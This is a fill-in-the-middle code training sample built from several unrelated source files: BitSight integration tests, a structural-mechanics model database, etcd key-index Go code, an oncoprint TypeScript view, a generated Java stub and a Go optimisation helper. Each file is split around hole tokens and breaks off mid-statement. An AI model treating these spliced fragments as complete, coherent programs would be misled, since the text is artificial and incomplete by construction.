res = {"results": [{"severity": "severe"}]}
mocker.patch.object(BaseClient, '_http_request', return_value=res)
_, outputs, _ = bitsight.get_company_findings_command(client, inp_args)
assert outputs[0].get('severity') == 'severe'
def test_fetch_incidents(mocker):
inp_args = {'guid': '123', 'findings_min_severity': 'severe', 'findings_grade': 'WARN',
'findings_asset_category': 'high', 'risk_vector': 'breaches,dkim'}
client = bitsight.Client(base_url='https://test.com')
mocker.patch.object(demisto, 'params', return_value=inp_args)
res = {"results": [{"severity": "severe", "first_seen": "2021-02-01", "temporary_id": "temp1"}]}
mocker.patch.object(BaseClient, '_http_request', return_value=res)
last_run, events = bitsight.fetch_incidents(client=client,
last_run={'time': '2020-12-01T01:01:01Z'},
params=inp_args)
curr_date = datetime.now().strftime('%Y-%m-%d')
assert curr_date in last_run['time']
assert events == [{'name': 'BitSight Finding - temp1', 'occurred': '2021-02-01T00:00:00Z',
'rawJSON': '{"severity": "severe", "first_seen": "2021-02-01", "temporary_id": "temp1"}'}]<|fim▁end|> | _, outputs, _ = bitsight.get_company_details_command(client, inp_args)
assert outputs.get('name') == 'abc'
|
<|file_name|>modelDB.py<|end_file_name|><|fim▁begin|>r"""
Used to configure the main parameters for each implemented model.
.. currentmodule:: compmech.conecyl.modelDB
"""
import numpy as np
from scipy.sparse import coo_matrix
from clpt import *
from fsdt import *
db = {
'clpt_donnell_bc1': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc1,
'linear': clpt_donnell_bc1_linear,
'non-linear': clpt_donnell_bc1_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'clpt_donnell_bc2': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc2,
'linear': clpt_donnell_bc2_linear,
'non-linear': clpt_donnell_bc2_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'iso_clpt_donnell_bc2': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc2,
'linear': iso_clpt_donnell_bc2_linear,
'non-linear': iso_clpt_donnell_bc2_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'clpt_donnell_bc3': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc3,
'linear': clpt_donnell_bc3_linear,
'non-linear': clpt_donnell_bc3_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'iso_clpt_donnell_bc3': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc3,
'linear': iso_clpt_donnell_bc3_linear,
'non-linear': iso_clpt_donnell_bc3_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'clpt_donnell_bc4': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc4,
'linear': clpt_donnell_bc4_linear,
'non-linear': clpt_donnell_bc4_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'clpt_donnell_bcn': {
'linear static': True,
'linear buckling': False,
'non-linear static': None,
'commons': clpt_commons_bcn,
'linear': clpt_donnell_bcn_linear,
'non-linear': None,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 8,
},
'clpt_sanders_bc1': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc1,
'linear': clpt_sanders_bc1_linear,
'non-linear': clpt_sanders_bc1_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'clpt_sanders_bc2': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc2,
'linear': clpt_sanders_bc2_linear,
'non-linear': clpt_sanders_bc2_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'clpt_sanders_bc3': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc3,
'linear': clpt_sanders_bc3_linear,
'non-linear': clpt_sanders_bc3_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'clpt_sanders_bc4': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': clpt_commons_bc4,
'linear': clpt_sanders_bc4_linear,
'non-linear': clpt_sanders_bc4_nonlinear,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 3,
'num2': 6,
},
'clpt_geier1997_bc2': {
'linear static': None,
'linear buckling': True,
'non-linear static': None,
'commons': clpt_geier1997_bc2,
'linear': clpt_geier1997_bc2,
'non-linear': None,
'dofs': 3,
'e_num': 6,
'i0': 0,
'j0': 0,
'num0': 0,
'num1': 0,
'num2': 3,
},
'fsdt_donnell_bcn': {
'linear static': True,
'linear buckling': False,
'non-linear static': True,
'commons': fsdt_commons_bcn,
'linear': fsdt_donnell_bcn_linear,
'non-linear': fsdt_donnell_bcn_nonlinear,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 5,
'num2': 10,
},
'fsdt_donnell_bc1': {
'linear static': True,
'linear buckling': True,
'non-linear static': True,
'commons': fsdt_commons_bc1,
'linear': fsdt_donnell_bc1_linear,
'non-linear': fsdt_donnell_bc1_nonlinear,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 5,
'num2': 10,
},
'fsdt_donnell_bc2': {
'linear static': True,
'linear buckling': True,
'non-linear static': False,
'commons': fsdt_commons_bc2,
'linear': fsdt_donnell_bc2_linear,
'non-linear': fsdt_donnell_bc2_nonlinear,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 5,
'num2': 10,
},
'fsdt_donnell_bc3': {
'linear static': True,
'linear buckling': True,
'non-linear static': False,
'commons': fsdt_commons_bc3,
'linear': fsdt_donnell_bc3_linear,
'non-linear': fsdt_donnell_bc3_nonlinear,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 5,
'num2': 10,
},
'fsdt_donnell_bc4': {
'linear static': True,
'linear buckling': True,
'non-linear static': False,
'commons': fsdt_commons_bc4,
'linear': fsdt_donnell_bc4_linear,
'non-linear': fsdt_donnell_bc4_nonlinear,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 5,
'num2': 10,
},
'fsdt_sanders_bcn': {
'linear static': True,
'linear buckling': False,
'non-linear static': False,
'commons': fsdt_commons_bcn,
'linear': fsdt_sanders_bcn_linear,
'non-linear': None,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 1,
'num0': 3,
'num1': 5,
'num2': 10,
},
'fsdt_shadmehri2012_bc2': {
'linear static': None,
'linear buckling': True,
'non-linear static': None,
'commons': fsdt_shadmehri2012_bc2,
'linear': fsdt_shadmehri2012_bc2,
'non-linear': None,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 0,
'num0': 0,
'num1': 0,
'num2': 5,
},
'fsdt_shadmehri2012_bc3': {
'linear static': None,
'linear buckling': True,
'non-linear static': None,
'commons': fsdt_shadmehri2012_bc3,
'linear': fsdt_shadmehri2012_bc3,
'non-linear': None,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 0,
'num0': 0,
'num1': 0,
'num2': 5,
},
'fsdt_geier1997_bc2': {
'linear static': None,
'linear buckling': True,
'non-linear static': None,
'commons': fsdt_geier1997_bc2,
'linear': fsdt_geier1997_bc2,
'non-linear': None,
'dofs': 5,
'e_num': 8,
'i0': 0,
'j0': 0,
'num0': 0,
'num1': 0,
'num2': 5,
},
}
def get_linear_matrices(cc, combined_load_case=None):
r"""Obtain the right functions to calculate hte linear matrices
for a given model.
The ``model`` parameter of the ``ConeCyl`` object is used to search
for the functions ``fG0``, ``fG0_cyl``, ``fkG0``, ``fkG0_cyl``,
and the matrix ``k0edges`` is calculated, when applicable.
Parameters
----------
cc : compmech.conecyl.ConeCyl
The ``ConeCyl`` object.
combined_load_case : int, optional
As explained in the :meth:`ConeCyl.lb() <compmech.conecyl.ConeCyl.lb>`
method, the integer indicating
which combined load case should be used. Default is ``None``.
Returns
-------
out : tuple
A tuple containing ``(fk0, fk0_cyl, fkG0, fkG0_cyl, k0edges)``.
"""
r1 = cc.r1
r2 = cc.r2
L = cc.L
m1 = cc.m1
m2 = cc.m2
n2 = cc.n2
model = cc.model
try:
if 'iso_' in model:
fk0edges = db[model[4:]]['linear'].fk0edges
else:
fk0edges = db[model]['linear'].fk0edges
except AttributeError:
k0edges = None
if model == 'clpt_donnell_bc1':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kphixBot, cc.kphixTop)
elif model == 'clpt_donnell_bc2':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kuBot, cc.kuTop,
cc.kphixBot, cc.kphixTop)
elif model == 'iso_clpt_donnell_bc2':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kuBot, cc.kuTop,
cc.kphixBot, cc.kphixTop)
elif model == 'clpt_donnell_bc3':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kvBot, cc.kvTop,
cc.kphixBot, cc.kphixTop)
elif model == 'iso_clpt_donnell_bc3':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kvBot, cc.kvTop,
cc.kphixBot, cc.kphixTop)
elif model == 'clpt_donnell_bc4':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kuBot, cc.kuTop,
cc.kvBot, cc.kvTop,
cc.kphixBot, cc.kphixTop)
elif model == 'clpt_donnell_bcn':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kuBot, cc.kuTop,
cc.kvBot, cc.kvTop,
cc.kwBot, cc.kwTop,
cc.kphixBot, cc.kphixTop,
cc.kphitBot, cc.kphitTop)
elif model == 'clpt_sanders_bc1':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kphixBot, cc.kphixTop)
elif model == 'clpt_sanders_bc2':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kuBot, cc.kuTop,
cc.kphixBot, cc.kphixTop)
elif model == 'clpt_sanders_bc3':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kvBot, cc.kvTop,
cc.kphixBot, cc.kphixTop)
<|fim▁hole|> cc.kphixBot, cc.kphixTop)
elif model == 'clpt_geier1997_bc2':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kuBot, cc.kuTop,
cc.kphixBot, cc.kphixTop)
elif model == 'fsdt_donnell_bc1':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kphixBot, cc.kphixTop)
elif model == 'fsdt_donnell_bc2':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kuBot, cc.kuTop,
cc.kphixBot, cc.kphixTop)
elif model == 'fsdt_donnell_bc3':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kvBot, cc.kvTop,
cc.kphixBot, cc.kphixTop)
elif model == 'fsdt_donnell_bc4':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kuBot, cc.kuTop,
cc.kvBot, cc.kvTop,
cc.kphixBot, cc.kphixTop)
elif model == 'fsdt_donnell_bcn':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kuBot, cc.kuTop,
cc.kvBot, cc.kvTop,
cc.kwBot, cc.kwTop,
cc.kphixBot, cc.kphixTop,
cc.kphitBot, cc.kphitTop)
elif model == 'fsdt_sanders_bcn':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kuBot, cc.kuTop,
cc.kvBot, cc.kvTop,
cc.kwBot, cc.kwTop,
cc.kphixBot, cc.kphixTop,
cc.kphitBot, cc.kphitTop)
elif model == 'fsdt_shadmehri2012_bc2':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kuBot, cc.kuTop,
cc.kphixBot, cc.kphixTop)
elif model == 'fsdt_shadmehri2012_bc3':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kvBot, cc.kvTop,
cc.kphixBot, cc.kphixTop)
elif model == 'fsdt_geier1997_bc2':
k0edges = fk0edges(m1, m2, n2, r1, r2,
cc.kuBot, cc.kuTop,
cc.kphixBot, cc.kphixTop)
fk0 = db[model]['linear'].fk0
fk0_cyl = db[model]['linear'].fk0_cyl
if 'iso_' in model:
fkG0 = db[model[4:]]['linear'].fkG0
fkG0_cyl = db[model[4:]]['linear'].fkG0_cyl
else:
fkG0 = db[model]['linear'].fkG0
fkG0_cyl = db[model]['linear'].fkG0_cyl
return fk0, fk0_cyl, fkG0, fkG0_cyl, k0edges
valid_models = sorted(db.keys())
def get_model(model_name):
if not model_name in valid_models:
raise ValueError('ERROR - valid models are:\n ' +
'\n '.join(valid_models))
else:
return db[model_name]<|fim▁end|> | elif model == 'clpt_sanders_bc4':
k0edges = fk0edges(m1, m2, n2, r1, r2, L,
cc.kuBot, cc.kuTop,
cc.kvBot, cc.kvTop, |
<|file_name|>key_index.go<|end_file_name|><|fim▁begin|>// Copyright 2015 CoreOS, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package storage
import (
"bytes"
"errors"
"fmt"
"log"
"github.com/coreos/etcd/Godeps/_workspace/src/github.com/google/btree"
)
var (
ErrRevisionNotFound = errors.New("stroage: revision not found")
)
// keyIndex stores the revision of an key in the backend.
// Each keyIndex has at least one key generation.
// Each generation might have several key versions.
// Tombstone on a key appends an tombstone version at the end
// of the current generation and creates a new empty generation.
// Each version of a key has an index pointing to the backend.
//
// For example: put(1.0);put(2.0);tombstone(3.0);put(4.0);tombstone(5.0) on key "foo"
// generate a keyIndex:
// key: "foo"
// rev: 5
// generations:
// {empty}
// {4.0, 5.0(t)}
// {1.0, 2.0, 3.0(t)}
//
// Compact a keyIndex removes the versions with smaller or equal to
// rev except the largest one. If the generation becomes empty
// during compaction, it will be removed. if all the generations get
// removed, the keyIndex should be removed.
// For example:
// compact(2) on the previous example
// generations:
// {empty}
// {4.0, 5.0(t)}
// {2.0, 3.0(t)}
//
// compact(4)
// generations:
// {empty}
// {4.0, 5.0(t)}
//
// compact(5):
// generations:
// {empty} -> key SHOULD be removed.
//
// compact(6):
// generations:
// {empty} -> key SHOULD be removed.
type keyIndex struct {
key []byte
modified revision // the main rev of the last modification
generations []generation
}
// put puts a revision to the keyIndex.
func (ki *keyIndex) put(main int64, sub int64) {
rev := revision{main: main, sub: sub}
if !rev.GreaterThan(ki.modified) {
log.Panicf("store.keyindex: put with unexpected smaller revision [%v / %v]", rev, ki.modified)
}
if len(ki.generations) == 0 {
ki.generations = append(ki.generations, generation{})
}
g := &ki.generations[len(ki.generations)-1]
if len(g.revs) == 0 { // create a new key
keysGauge.Inc()
g.created = rev
}
g.revs = append(g.revs, rev)
g.ver++
ki.modified = rev
}
func (ki *keyIndex) restore(created, modified revision, ver int64) {
if len(ki.generations) != 0 {
log.Panicf("store.keyindex: cannot restore non-empty keyIndex")
}
ki.modified = modified
g := generation{created: created, ver: ver, revs: []revision{modified}}
ki.generations = append(ki.generations, g)
keysGauge.Inc()
}
// tombstone puts a revision, pointing to a tombstone, to the keyIndex.
// It also creates a new empty generation in the keyIndex.
// It returns ErrRevisionNotFound when tombstone on an empty generation.
func (ki *keyIndex) tombstone(main int64, sub int64) error {
if ki.isEmpty() {
log.Panicf("store.keyindex: unexpected tombstone on empty keyIndex %s", string(ki.key))
}
if ki.generations[len(ki.generations)-1].isEmpty() {
return ErrRevisionNotFound
}
ki.put(main, sub)
ki.generations = append(ki.generations, generation{})
keysGauge.Dec()
return nil
}
// get gets the modified, created revision and version of the key that satisfies the given atRev.
// Rev must be higher than or equal to the given atRev.
func (ki *keyIndex) get(atRev int64) (modified, created revision, ver int64, err error) {
if ki.isEmpty() {
log.Panicf("store.keyindex: unexpected get on empty keyIndex %s", string(ki.key))
}
g := ki.findGeneration(atRev)
if g.isEmpty() {
return revision{}, revision{}, 0, ErrRevisionNotFound
}
f := func(rev revision) bool {
if rev.main <= atRev {
return false
}
return true
}<|fim▁hole|> return g.revs[n], g.created, g.ver - int64(len(g.revs)-n-1), nil
}
return revision{}, revision{}, 0, ErrRevisionNotFound
}
// since returns revisions since the give rev. Only the revision with the
// largest sub revision will be returned if multiple revisions have the same
// main revision.
func (ki *keyIndex) since(rev int64) []revision {
if ki.isEmpty() {
log.Panicf("store.keyindex: unexpected get on empty keyIndex %s", string(ki.key))
}
since := revision{rev, 0}
var gi int
// find the generations to start checking
for gi = len(ki.generations) - 1; gi > 0; gi-- {
g := ki.generations[gi]
if g.isEmpty() {
continue
}
if since.GreaterThan(g.created) {
break
}
}
var revs []revision
var last int64
for ; gi < len(ki.generations); gi++ {
for _, r := range ki.generations[gi].revs {
if since.GreaterThan(r) {
continue
}
if r.main == last {
// replace the revision with a new one that has higher sub value,
// because the original one should not be seen by external
revs[len(revs)-1] = r
continue
}
revs = append(revs, r)
last = r.main
}
}
return revs
}
// compact compacts a keyIndex by removing the versions with smaller or equal
// revision than the given atRev except the largest one (If the largest one is
// a tombstone, it will not be kept).
// If a generation becomes empty during compaction, it will be removed.
func (ki *keyIndex) compact(atRev int64, available map[revision]struct{}) {
if ki.isEmpty() {
log.Panicf("store.keyindex: unexpected compact on empty keyIndex %s", string(ki.key))
}
// walk until reaching the first revision that has an revision smaller or equal to
// the atRevision.
// add it to the available map
f := func(rev revision) bool {
if rev.main <= atRev {
available[rev] = struct{}{}
return false
}
return true
}
i, g := 0, &ki.generations[0]
// find first generation includes atRev or created after atRev
for i < len(ki.generations)-1 {
if tomb := g.revs[len(g.revs)-1].main; tomb > atRev {
break
}
i++
g = &ki.generations[i]
}
if !g.isEmpty() {
n := g.walk(f)
// remove the previous contents.
if n != -1 {
g.revs = g.revs[n:]
}
// remove any tombstone
if len(g.revs) == 1 && i != len(ki.generations)-1 {
delete(available, g.revs[0])
i++
}
}
// remove the previous generations.
ki.generations = ki.generations[i:]
return
}
func (ki *keyIndex) isEmpty() bool {
return len(ki.generations) == 1 && ki.generations[0].isEmpty()
}
// findGeneartion finds out the generation of the keyIndex that the
// given rev belongs to. If the given rev is at the gap of two generations,
// which means that the key does not exist at the given rev, it returns nil.
func (ki *keyIndex) findGeneration(rev int64) *generation {
lastg := len(ki.generations) - 1
cg := lastg
for cg >= 0 {
if len(ki.generations[cg].revs) == 0 {
cg--
continue
}
g := ki.generations[cg]
if cg != lastg {
if tomb := g.revs[len(g.revs)-1].main; tomb <= rev {
return nil
}
}
if g.revs[0].main <= rev {
return &ki.generations[cg]
}
cg--
}
return nil
}
func (a *keyIndex) Less(b btree.Item) bool {
return bytes.Compare(a.key, b.(*keyIndex).key) == -1
}
func (a *keyIndex) equal(b *keyIndex) bool {
if !bytes.Equal(a.key, b.key) {
return false
}
if a.modified != b.modified {
return false
}
if len(a.generations) != len(b.generations) {
return false
}
for i := range a.generations {
ag, bg := a.generations[i], b.generations[i]
if !ag.equal(bg) {
return false
}
}
return true
}
func (ki *keyIndex) String() string {
var s string
for _, g := range ki.generations {
s += g.String()
}
return s
}
// generation contains multiple revisions of a key.
type generation struct {
ver int64
created revision // when the generation is created (put in first revision).
revs []revision
}
func (g *generation) isEmpty() bool { return g == nil || len(g.revs) == 0 }
// walk walks through the revisions in the generation in descending order.
// It passes the revision to the given function.
// walk returns until: 1. it finishes walking all pairs 2. the function returns false.
// walk returns the position at where it stopped. If it stopped after
// finishing walking, -1 will be returned.
func (g *generation) walk(f func(rev revision) bool) int {
l := len(g.revs)
for i := range g.revs {
ok := f(g.revs[l-i-1])
if !ok {
return l - i - 1
}
}
return -1
}
func (g *generation) String() string {
return fmt.Sprintf("g: created[%d] ver[%d], revs %#v\n", g.created, g.ver, g.revs)
}
func (a generation) equal(b generation) bool {
if a.ver != b.ver {
return false
}
if len(a.revs) != len(b.revs) {
return false
}
for i := range a.revs {
ar, br := a.revs[i], b.revs[i]
if ar != br {
return false
}
}
return true
}<|fim▁end|> |
n := g.walk(f)
if n != -1 { |
<|file_name|>oncoprintheaderview.ts<|end_file_name|><|fim▁begin|>import OncoprintModel from "./oncoprintmodel";
import menuDotsIcon from "../img/menudots.svg";
import svgfactory from "./svgfactory";
import $ from "jquery";
import ClickEvent = JQuery.ClickEvent;
import {CLOSE_MENUS_EVENT as TRACK_OPTIONS_VIEW_CLOSE_MENUS_EVENT} from "./oncoprinttrackoptionsview";
const MENU_DOTS_SIZE = 20;
const LABEL_CLASS = "oncoprintjs__header__label";
const TOGGLE_BTN_CLASS = "oncoprintjs__header__toggle_btn_img";
const TOGGLE_BTN_OPEN_CLASS = "oncoprintjs__header__open";
const DROPDOWN_CLASS = "oncoprintjs__header__dropdown";
const SEPARATOR_CLASS = "oncoprintjs__header__separator";
const NTH_CLASS_PREFIX = "track-group-";
const FADE_MS = 100;
const HEADER_FONT_SIZE = 16;
export const CLOSE_MENUS_EVENT = "oncoprint-header-view.do-close-menus";
export default class OncoprintHeaderView {
private rendering_suppressed = false;
private $occluded_ctr:JQuery; // holds labels and menu buttons, which can be occluded by scrolling
private $dropdowns_ctr:JQuery;
private clickHandler:()=>void;
private $dropdowns:JQuery[] = [];
constructor($div:JQuery) {
$div.css({
position:'relative',
'pointer-events':'none'
});
const $occluding_superctr = $("<div/>").appendTo($div).css({
position:'relative',
'overflow-y':'hidden',
'overflow-x':'hidden',
width:"100%",
height:"100%"
});
this.$occluded_ctr = $("<div/>").appendTo($occluding_superctr).css({
position:'absolute',
width: "100%",
height: "100%"
});
this.$dropdowns_ctr = $("<div/>").appendTo($div).css({
position:'absolute',
width: "100%",
height: "100%"
});
this.clickHandler = ()=>{
$(document).trigger(CLOSE_MENUS_EVENT);
};
$(document).on("click", this.clickHandler);
$(document).on(CLOSE_MENUS_EVENT, ()=>{
this.closeAllDropdowns();
});
}
public destroy() {
$(document).off("click", this.clickHandler);
$(document).off(CLOSE_MENUS_EVENT);
}
private closeAllDropdowns() {
for (const $dropdown of this.$dropdowns) {
$dropdown.fadeOut(FADE_MS);
}
}
private closeDropdownsExcept($keep_open_dropdown:JQuery) {
for (const $dropdown of this.$dropdowns) {
if ($dropdown !== $keep_open_dropdown) {
$dropdown.fadeOut(FADE_MS);
}
}
$(document).trigger(TRACK_OPTIONS_VIEW_CLOSE_MENUS_EVENT);
}
private static $makeDropdownOption(text:string, weight:string, isDisabled?:()=>boolean, callback?:(evt:ClickEvent)=>void) {
const li = $('<li>').text(text).css({'font-weight': weight, 'font-size': 12, 'border-bottom': '1px solid rgba(0,0,0,0.3)'});
const disabled = isDisabled && isDisabled();
if (!disabled) {
if (callback) {
li.addClass("clickable");
li.css({'cursor': 'pointer'});
li.click(callback)
.hover(function () {
$(this).css({'background-color': 'rgb(200,200,200)'});
}, function () {
$(this).css({'background-color': 'rgba(255,255,255,0)'});
});
} else {
li.click(function(evt) { evt.stopPropagation(); });
}
} else {
li.addClass("disabled");
li.css({'color': 'rgb(200, 200, 200)', 'cursor': 'default'});
}
return li;
}
private static $makeDropdownSeparator() {
return $('<li>').css({'border-top': '1px solid black'}).addClass(SEPARATOR_CLASS);
}
public render(model:OncoprintModel) {
// clear existing elements
this.$occluded_ctr.empty();
this.$occluded_ctr.css({
top:-model.getVertScroll()
});
this.$dropdowns_ctr.empty();
this.$dropdowns_ctr.css({
top:-model.getVertScroll()
});
this.$dropdowns = [];
// add headers
const trackGroups = model.getTrackGroups();
const headerTops = model.getZoomedHeaderTops();
trackGroups.forEach((group, trackGroupIndex)=>{
if (group.header) {
const $headerDiv = $("<div/>").css({
'pointer-events':'auto'
});
// add label
$(`<span>${group.header.label.text}</span>`)
.appendTo($headerDiv)
.css({
"margin-right":10,
// TODO - custom styling
"font-weight":"bold",
"text-decoration":"underline",
"font-size":HEADER_FONT_SIZE,
"font-family":"Arial"
}).addClass(LABEL_CLASS);
if (group.header.options.length > 0) {
// add dropdown menu
const $dropdown = $('<ul>')
.appendTo(this.$dropdowns_ctr)
.css({
'position':'absolute',
'width': 120,
'display': 'none',
'list-style-type': 'none',
'padding-left': '6',
'padding-right': '6',
'float': 'right',
'background-color': 'rgb(255,255,255)',
'left':'0px',
'top': headerTops[trackGroupIndex] + MENU_DOTS_SIZE,
'pointer-events':'auto'
})
.addClass(DROPDOWN_CLASS).addClass(NTH_CLASS_PREFIX+(trackGroupIndex));
this.$dropdowns.push($dropdown);
const populateDropdownOptions = ()=>{
// repopulate dropdown every time it opens, and every time an option is clicked,
// in order to update dynamic disabled status and weight
$dropdown.empty();
// add dropdown options
group.header.options.forEach((option)=>{
if (option.separator) {
$dropdown.append(OncoprintHeaderView.$makeDropdownSeparator());
} else {
$dropdown.append(OncoprintHeaderView.$makeDropdownOption(
option.label || "",
option.weight ? option.weight() : "normal",
option.disabled,
function(evt) {
evt.stopPropagation();<|fim▁hole|> populateDropdownOptions();
}
));
}
});
};
// add dropdown button
const $img = $("<img/>")
.appendTo($headerDiv)
.attr({
src: menuDotsIcon,
width:MENU_DOTS_SIZE,
height:MENU_DOTS_SIZE
})
.css({
cursor:"pointer",
border:"1px solid rgba(125,125,125,0)",
display:"inline-block"
})
.addClass(TOGGLE_BTN_CLASS).addClass(NTH_CLASS_PREFIX+(trackGroupIndex))
.on("click", (evt)=>{
evt.stopPropagation();
if ($dropdown.is(":visible")) {
$img.removeClass(TOGGLE_BTN_OPEN_CLASS);
$dropdown.fadeOut(FADE_MS);
} else {
populateDropdownOptions();
$dropdown.css('left', $img.offset().left);
$img.addClass(TOGGLE_BTN_OPEN_CLASS);
$dropdown.fadeIn(FADE_MS);
this.closeDropdownsExcept($dropdown);
}
});
}
$headerDiv.css({
position:"absolute",
top:headerTops[trackGroupIndex],
left:0,
width:"100%"
});
this.$occluded_ctr.append($headerDiv);
}
});
}
public setScroll(model:OncoprintModel) {
this.$occluded_ctr.css({
top:-model.getVertScroll()
});
this.$dropdowns_ctr.css({
top:-model.getVertScroll()
});
this.closeAllDropdowns();
}
public setVertScroll(model:OncoprintModel) {
this.setScroll(model);
}
public suppressRendering() {
this.rendering_suppressed = true;
}
public releaseRendering(model:OncoprintModel) {
this.rendering_suppressed = false;
this.render(model);
}
public toSVGGroup(model:OncoprintModel, offset_x:number, offset_y:number) {
const group = svgfactory.group((offset_x || 0), (offset_y || 0));
const trackGroups = model.getTrackGroups();
const headerTops = model.getZoomedHeaderTops();
trackGroups.forEach((trackGroup, index)=>{
const header = trackGroup.header
if (header) {
const y = headerTops[index];
group.appendChild(svgfactory.text(
header.label.text,
0, y,
HEADER_FONT_SIZE,
"Arial",
"bold",
undefined,
undefined,
"underline"
))
}
});
return group;
}
}<|fim▁end|> | option.onClick && option.onClick(trackGroupIndex); |
<|file_name|>BaseSharedNewConcernImpl.java<|end_file_name|><|fim▁begin|>//#############################################################################
//# #
//# Copyright (C) <2014> <IMS MAXIMS> #
//# #
//# This program is free software: you can redistribute it and/or modify #
//# it under the terms of the GNU Affero General Public License as #
//# published by the Free Software Foundation, either version 3 of the #
//# License, or (at your option) any later version. #
//# #
//# This program is distributed in the hope that it will be useful, #
//# but WITHOUT ANY WARRANTY; without even the implied warranty of #
//# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
//# GNU Affero General Public License for more details. #
//# #
//# You should have received a copy of the GNU Affero General Public License #
//# along with this program. If not, see <http://www.gnu.org/licenses/>. #
//# #
//#############################################################################
//#EOH
// This code was generated by Barbara Worwood using IMS Development Environment (version 1.80 build 5007.25751)
// Copyright (C) 1995-2014 IMS MAXIMS. All rights reserved.
// WARNING: DO NOT MODIFY the content of this file
package ims.spinalinjuries.domain.base.impl;
<|fim▁hole|>import ims.domain.impl.DomainImpl;
public abstract class BaseSharedNewConcernImpl extends DomainImpl implements ims.spinalinjuries.domain.SharedNewConcern, ims.domain.impl.Transactional
{
private static final long serialVersionUID = 1L;
@SuppressWarnings("unused")
public void validatesaveConcern(ims.core.vo.PatientCurrentConcernVo concern, ims.core.vo.PatientShort patient)
{
}
@SuppressWarnings("unused")
public void validatelistHcps(ims.core.vo.HcpFilter filter)
{
}
@SuppressWarnings("unused")
public void validatelistProbsOnAdmission(ims.core.vo.CareContextShortVo coClinicalContactShort)
{
}
@SuppressWarnings("unused")
public void validategetConcern(ims.core.clinical.vo.PatientConcernRefVo concernId)
{
}
}<|fim▁end|> | |
<|file_name|>validate.go<|end_file_name|><|fim▁begin|>// Copyright ©2015 The gonum Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package functions
import (
"math"
"testing"
"gonum.org/v1/gonum/diff/fd"
"gonum.org/v1/gonum/floats"
)
// function represents an objective function.
type function interface {
Func(x []float64) float64
}
type gradient interface {
Grad(grad, x []float64)
}
// minimumer is an objective function that can also provide information about
// its minima.
type minimumer interface {
function
// Minima returns _known_ minima of the function.
Minima() []Minimum
}
// Minimum represents information about an optimal location of a function.
type Minimum struct {
